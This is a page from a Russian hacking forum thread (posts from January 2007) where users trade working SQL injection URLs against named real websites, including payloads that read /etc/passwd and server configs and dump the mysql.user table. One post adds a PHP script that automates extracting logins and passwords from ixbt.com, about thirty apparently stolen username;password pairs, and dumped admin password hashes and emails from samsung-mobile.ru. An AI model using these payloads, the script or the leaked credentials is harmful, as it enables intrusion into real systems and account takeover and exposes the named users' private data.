ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #251  
Старый 15.01.2007, 22:44
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,0x707265766564203a44,4,5,6,7,8 ,9,10,11/*
гыы - IXBT можете юзать
 
Ответить с цитированием

  #252  
Старый 15.01.2007, 22:50
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://aprilia.ru/news.php?id=-99+union+select+1,0x707265766564203a44,3,4,5+from+ user/*
.)
 
Ответить с цитированием

  #253  
Старый 15.01.2007, 23:08
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,AES_DECRYPT(%20AES_ENCRYPT(U SER,0x71),0x71),5+from+mysql.user+limit+1,1/*

http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5/*

http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,LOAD_FILE('/usr/local/apache/conf/httpd.conf'),5/*

etc... .)
 
Ответить с цитированием

  #254  
Старый 15.01.2007, 23:38
Аватар для pop_korn
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

http://www.dvoikatroika.cz/partylist.php?idprt=-388+UNION+SELECT+1,convert(login%20using%20latin2) ,convert(pass%20using%20latin2),4,5,6,7,8,9,0,1,2, 3,4+from+users/*
 
Ответить с цитированием

  #255  
Старый 15.01.2007, 23:57
Аватар для SQLHACK
SQLHACK
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
Провел на форуме:
1607210

Репутация: 1617


Отправить сообщение для SQLHACK с помощью ICQ
По умолчанию

http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,login,4,5,6,7,8%20,9,password, 11%20from%20user%20limit%201,1/*
 
Ответить с цитированием

  #256  
Старый 16.01.2007, 00:27
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от SQLHACK  
http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,login,4,5,6,7,8%20,9,password, 11%20from%20user%20limit%201,1/*
ммм, я специально расписывать не стал =\ а ты
 
Ответить с цитированием

  #257  
Старый 16.01.2007, 01:48
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Ночью делать однозначно нечего =\:
Код:
http://www.samsung-mobile.ru/news.php?id=-99+union+select+1,2,table_name,4,5,6+from+INFORMATION_SCHEMA.TABLES/*
 
Ответить с цитированием

  #258  
Старый 16.01.2007, 04:09
Аватар для LAMAREZ
LAMAREZ
Новичок
Регистрация: 16.01.2006
Сообщений: 24
Провел на форуме:
87233

Репутация: 63
По умолчанию

Цитата:
www.ixbt.com:
===================
unclesam;superpassword
archont;nre11pk
alien;qwos93qrt
star;ver3new
root;another_enter
maxim;vtykytkq
eightn;rvcrrxxr
Cormac;corm
alexcob;mOpoNitO
axbat;se9rq1hM
kryakvina;elf15w40
-bsv-;Hobotrulitadnaznachna
sherbakovs;Rt4df56gZ
rwpbb;ymtupknl
Thunder;Ghtd6fGkl
WSiberian;Ahde9oyeni
Anvakams;fgs6hJKl9
lemar;dfddfkjf
PageEnd;let67dHjk
Neo;dghlo53FUki
digitalhome;superpassword
bess;ehyj2hrf
Sen;sdklt673GhD
Accent;ghetYJkl73LdS
evgeniy;eferwg
BlackCat;dfGt56kLsV
sergeyk;gfsl563gHtW
san-red;gHj952KlD
bugz;sdo349FgHy
jin;gsDfK729Fger
ElenaN;gdHjKl56dE3
PHP код:
<?
 
echo "<pre>\n";
 @
set_time_limit(0);
 @
ini_set("display_errors","0");
 
$hostname gethostbyname('www.ixbt.com');
 function 
getid($limit)
 {
  global 
$hostname;
  
$responce "";
  
$fsock    fsockopen($hostname,80,$errnum,$errstr,2);
  
$headers  "GET http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,CONCAT(CHAR(60,115,113,108,62),login,CHAR(59),password,CHAR(60,47,115,113,108,62)),4,5,6,7,8%20,9,10,11%20from%20user%20limit%20$limit,1/* HTTP/1.1\n";
  
$headers .= "Host: www.ixbt.com\n";
  
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
  
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
  
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
  
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
  
$headers .= "Keep-Alive: 500\n";
  
$headers .= "Connection: close\n";
  
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
  
fwrite   ($fsock,$headers);
  while    (!
feof($fsock)) $responce .= fread($fsock,1024); 
  
fclose   ($fsock);
 
$patern "#<[\s]*sql[\s]*>([^<]*)<[\s]*/sql[\s]*>#i";
if(
preg_match($patern$responce$rez)) echo $rez[1]; else echo 'Something not right...';
}
for(
$i=1;$i<32;$i++) {getid($i);echo "\n";}
echo 
"</pre>";
?>
про самсунг:

http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_id,use r_name,user_real_name,user_password,user_newpasswo rd,user_email),4,5,6+from+user/*
1;Wikiadmin;;3538bde67069fb42237f004aae66f73b;;


user_login,user_pass,user_icq,user_email,user_doma in,user_activation_key


http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_login, user_pass,user_icq,user_email,user_domain,user_act ivation_key),4,5,6+from+blog_users/*

admin;dfed24dcf4255aa50fe4a7ebf291cece;0;post@sams ung-mobile.ru;;
Moderator;d8578edf8458ce06fbc5bb76a58c5ca4;0;post@ samsung-mobile.ru;;
 
Ответить с цитированием

  #259  
Старый 16.01.2007, 10:41
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

MDMKino

http://www.mdmkino.ru/filminfo.php3?id=1014%20UNION%20SELECT%200,1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29/*
 
Ответить с цитированием

  #260  
Старый 16.01.2007, 14:29
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.cris.net/news.php?id=-99+union+select+1,user,password,4+from+mysql.user/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ